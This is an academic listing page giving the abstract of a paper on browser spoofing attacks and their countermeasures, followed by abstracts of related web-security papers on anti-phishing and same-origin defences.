Trust on Web Browser: Attack vs. Defense
نویسندگان
چکیده
This paper proposes a browser spoofing attack which can break the weakest link from the server to user, i.e., man-computerinterface, and hence defeat the whole security system of Internet transaction. In this attack, when a client is misled to an attacker’s site, or an attacker hijacks a connection, a set of malicious HTML files are downloaded to the client’s machine. The files are used to create a spoofed browser including a faked window with malicious event processing methods. The bogus window, having the same appearance as the original one, shows the “good” web content with “bad” activities behind such as disclosing password stealthily. Once the attack is mounted, even a scrupulous user will trust the browser that is fully controlled by the attacker. We further propose several countermeasures against the attack.
منابع مشابه
Client-Side Defense Against Web-Based Identity Theft
Web spoofing is a significant problem involving fraudulent email and web sites that trick unsuspecting users into revealing private information. We discuss some aspects of common attacks and propose a framework for client-side defense: a browser plug-in that examines web pages and warns the user when requests for data may be part of a spoof attack. While the plugin, SpoofGuard, has been tested ...
متن کاملEradicating DNS Rebinding with the Extended Same-origin Policy
The Web’s principal security policy is the Same-Origin Policy (SOP), which enforces origin-based isolation of mutually distrusting Web applications. Since the early days, the SOP was repeatedly undermined with variants of the DNS Rebinding attack, allowing untrusted script code to gain illegitimate access to protected network resources. To counter these attacks, the browser vendors introduced c...
متن کاملPreventing Web-Spoofing with Automatic Detecting Security Indicator
The anti-spoofing community has been intensively proposing new methods for defending against new spoofing techniques. It is still challenging for protecting näıve users from advanced spoofing attacks. In this paper, we analyze the problems within those anti-spoofing mechanisms and propose a new Automatic Detecting Security Indicator (ADSI) scheme. This paper describe the trust model in ADSI in ...
متن کاملChapter 5 Anti - Phishing Phil : A Case study in User education
Phishing is a kind of attack in which criminals use spoofed emails and fraudulent web sites to trick people into giving up personal information. Victims perceive these emails as associated with a trusted brand, while in reality they are the work of con artists interested in identity theft [57]. These increasingly sophisticated attacks not only spoof email and web sites, but they can also spoof ...
متن کاملLeast Privilege 2.0: Access Control for Web 2.0 applications
Modern web sites make extensive use of scripting in the browser to provide a rich user experience. Further, these sites frequently put together content (including scripts) from different trust domains. Traditional models of access control which give the same level of privilege for all scripts on the browser are inadequate. Common web vulnerabilities such as cross-site scripting (XSS) and cross ...
متن کامل